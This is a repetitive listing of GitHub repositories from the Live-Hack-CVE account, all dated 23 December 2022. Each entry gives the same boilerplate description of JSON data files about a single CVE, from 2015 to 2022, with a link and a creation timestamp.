**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13948 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13948](https://github.com/Live-Hack-CVE/CVE-2020-13948) create time: 2022-12-23T16:22:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25596 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25596](https://github.com/Live-Hack-CVE/CVE-2020-25596) create time: 2022-12-23T16:22:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12861](https://github.com/Live-Hack-CVE/CVE-2020-12861) create time: 2022-12-23T16:22:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12866](https://github.com/Live-Hack-CVE/CVE-2020-12866) create time: 2022-12-23T16:22:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8017](https://github.com/Live-Hack-CVE/CVE-2020-8017) create time: 2022-12-23T16:22:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1349 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1349](https://github.com/Live-Hack-CVE/CVE-2020-1349) create time: 2022-12-23T16:20:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1493 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1493](https://github.com/Live-Hack-CVE/CVE-2020-1493) create time: 2022-12-23T16:19:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16947](https://github.com/Live-Hack-CVE/CVE-2020-16947) create time: 2022-12-23T16:19:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8016](https://github.com/Live-Hack-CVE/CVE-2020-8016) create time: 2022-12-23T16:18:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14355 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14355](https://github.com/Live-Hack-CVE/CVE-2020-14355) create time: 2022-12-23T16:18:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2722 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2722](https://github.com/Live-Hack-CVE/CVE-2020-2722) create time: 2022-12-23T16:18:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25641](https://github.com/Live-Hack-CVE/CVE-2020-25641) create time: 2022-12-23T16:17:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6096](https://github.com/Live-Hack-CVE/CVE-2020-6096) create time: 2022-12-23T16:17:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1968 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1968](https://github.com/Live-Hack-CVE/CVE-2020-1968) create time: 2022-12-23T16:15:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10383](https://github.com/Live-Hack-CVE/CVE-2020-10383) create time: 2022-12-23T16:15:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10382 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10382](https://github.com/Live-Hack-CVE/CVE-2020-10382) create time: 2022-12-23T16:15:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17506 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17506](https://github.com/Live-Hack-CVE/CVE-2020-17506) create time: 2022-12-23T16:14:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0971 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0971](https://github.com/Live-Hack-CVE/CVE-2020-0971) create time: 2022-12-23T16:14:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12930 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12930](https://github.com/Live-Hack-CVE/CVE-2020-12930) create time: 2022-12-23T15:34:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12931 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12931](https://github.com/Live-Hack-CVE/CVE-2020-12931) create time: 2022-12-23T15:34:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36778](https://github.com/Live-Hack-CVE/CVE-2021-36778) create time: 2022-12-23T16:22:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3999 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3999](https://github.com/Live-Hack-CVE/CVE-2021-3999) create time: 2022-12-23T16:22:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28660 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28660](https://github.com/Live-Hack-CVE/CVE-2021-28660) create time: 2022-12-23T16:21:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20588](https://github.com/Live-Hack-CVE/CVE-2021-20588) create time: 2022-12-23T16:20:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38370 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38370](https://github.com/Live-Hack-CVE/CVE-2021-38370) create time: 2022-12-23T16:18:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32000 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32000](https://github.com/Live-Hack-CVE/CVE-2021-32000) create time: 2022-12-23T16:18:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33554 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33554](https://github.com/Live-Hack-CVE/CVE-2021-33554) create time: 2022-12-23T16:18:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33552 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33552](https://github.com/Live-Hack-CVE/CVE-2021-33552) create time: 2022-12-23T16:17:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33550](https://github.com/Live-Hack-CVE/CVE-2021-33550) create time: 2022-12-23T16:17:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33548 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33548](https://github.com/Live-Hack-CVE/CVE-2021-33548) create time: 2022-12-23T16:17:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33551 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33551](https://github.com/Live-Hack-CVE/CVE-2021-33551) create time: 2022-12-23T16:17:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33553 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33553](https://github.com/Live-Hack-CVE/CVE-2021-33553) create time: 2022-12-23T16:17:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31608 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31608](https://github.com/Live-Hack-CVE/CVE-2021-31608) create time: 2022-12-23T16:16:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46386](https://github.com/Live-Hack-CVE/CVE-2021-46386) create time: 2022-12-23T16:16:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33897](https://github.com/Live-Hack-CVE/CVE-2021-33897) create time: 2022-12-23T16:15:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32027 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32027](https://github.com/Live-Hack-CVE/CVE-2021-32027) create time: 2022-12-23T15:41:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34552 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34552](https://github.com/Live-Hack-CVE/CVE-2021-34552) create time: 2022-12-23T15:41:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23437](https://github.com/Live-Hack-CVE/CVE-2021-23437) create time: 2022-12-23T15:41:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32028 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32028](https://github.com/Live-Hack-CVE/CVE-2021-32028) create time: 2022-12-23T15:41:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3781](https://github.com/Live-Hack-CVE/CVE-2021-3781) create time: 2022-12-23T15:41:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3677 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3677](https://github.com/Live-Hack-CVE/CVE-2021-3677) create time: 2022-12-23T15:40:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23222](https://github.com/Live-Hack-CVE/CVE-2021-23222) create time: 2022-12-23T15:40:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23214 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23214](https://github.com/Live-Hack-CVE/CVE-2021-23214) create time: 2022-12-23T15:40:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36905 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36905](https://github.com/Live-Hack-CVE/CVE-2021-36905) create time: 2022-12-23T15:39:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37936 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37936](https://github.com/Live-Hack-CVE/CVE-2021-37936) create time: 2022-12-23T15:36:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31739 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31739](https://github.com/Live-Hack-CVE/CVE-2021-31739) create time: 2022-12-23T15:36:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22141 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22141](https://github.com/Live-Hack-CVE/CVE-2021-22141) create time: 2022-12-23T15:36:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3618](https://github.com/Live-Hack-CVE/CVE-2021-3618) create time: 2022-12-23T15:34:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26360 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26360](https://github.com/Live-Hack-CVE/CVE-2021-26360) create time: 2022-12-23T15:34:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26392 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26392](https://github.com/Live-Hack-CVE/CVE-2021-26392) create time: 2022-12-23T15:34:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40752 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40752](https://github.com/Live-Hack-CVE/CVE-2022-40752) create time: 2022-12-23T16:25:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37290 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37290](https://github.com/Live-Hack-CVE/CVE-2022-37290) create time: 2022-12-23T16:25:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44004 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44004](https://github.com/Live-Hack-CVE/CVE-2022-44004) create time: 2022-12-23T16:24:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44003 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44003](https://github.com/Live-Hack-CVE/CVE-2022-44003) create time: 2022-12-23T16:24:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44006 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44006](https://github.com/Live-Hack-CVE/CVE-2022-44006) create time: 2022-12-23T16:24:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40130 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40130](https://github.com/Live-Hack-CVE/CVE-2022-40130) create time: 2022-12-23T16:24:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41805](https://github.com/Live-Hack-CVE/CVE-2022-41805) create time: 2022-12-23T16:24:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40687 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40687](https://github.com/Live-Hack-CVE/CVE-2022-40687) create time: 2022-12-23T16:24:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40695](https://github.com/Live-Hack-CVE/CVE-2022-40695) create time: 2022-12-23T16:24:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41609 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41609](https://github.com/Live-Hack-CVE/CVE-2022-41609) create time: 2022-12-23T16:24:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40698](https://github.com/Live-Hack-CVE/CVE-2022-40698) create time: 2022-12-23T16:24:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44379 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44379](https://github.com/Live-Hack-CVE/CVE-2022-44379) create time: 2022-12-23T16:24:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43463](https://github.com/Live-Hack-CVE/CVE-2022-43463) create time: 2022-12-23T16:24:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40686 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40686](https://github.com/Live-Hack-CVE/CVE-2022-40686) create time: 2022-12-23T16:24:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38075 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38075](https://github.com/Live-Hack-CVE/CVE-2022-38075) create time: 2022-12-23T16:23:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44378 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44378](https://github.com/Live-Hack-CVE/CVE-2022-44378) create time: 2022-12-23T16:23:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43183 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43183](https://github.com/Live-Hack-CVE/CVE-2022-43183) create time: 2022-12-23T16:23:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3516](https://github.com/Live-Hack-CVE/CVE-2022-3516) create time: 2022-12-23T16:23:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3525 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3525](https://github.com/Live-Hack-CVE/CVE-2022-3525) create time: 2022-12-23T16:23:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3561 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3561](https://github.com/Live-Hack-CVE/CVE-2022-3561) create time: 2022-12-23T16:23:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3562](https://github.com/Live-Hack-CVE/CVE-2022-3562) create time: 2022-12-23T16:23:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38974 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38974](https://github.com/Live-Hack-CVE/CVE-2022-38974) create time: 2022-12-23T16:23:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4067 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4067](https://github.com/Live-Hack-CVE/CVE-2022-4067) create time: 2022-12-23T16:23:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4069 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4069](https://github.com/Live-Hack-CVE/CVE-2022-4069) create time: 2022-12-23T16:22:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4070 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4070](https://github.com/Live-Hack-CVE/CVE-2022-4070) create time: 2022-12-23T16:22:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2663 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2663](https://github.com/Live-Hack-CVE/CVE-2022-2663) create time: 2022-12-23T16:22:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38538 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38538](https://github.com/Live-Hack-CVE/CVE-2022-38538) create time: 2022-12-23T16:22:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45383](https://github.com/Live-Hack-CVE/CVE-2022-45383) create time: 2022-12-23T16:22:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4051 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4051](https://github.com/Live-Hack-CVE/CVE-2022-4051) create time: 2022-12-23T16:22:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20928](https://github.com/Live-Hack-CVE/CVE-2022-20928) create time: 2022-12-23T16:22:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-20107 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-20107](https://github.com/Live-Hack-CVE/CVE-2015-20107) create time: 2022-12-23T14:19:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16780 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16780](https://github.com/Live-Hack-CVE/CVE-2019-16780) create time: 2022-12-23T14:56:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20041 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20041](https://github.com/Live-Hack-CVE/CVE-2019-20041) create time: 2022-12-23T14:56:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0053 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0053](https://github.com/Live-Hack-CVE/CVE-2019-0053) create time: 2022-12-23T14:54:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14870](https://github.com/Live-Hack-CVE/CVE-2019-14870) create time: 2022-12-23T14:51:18Z

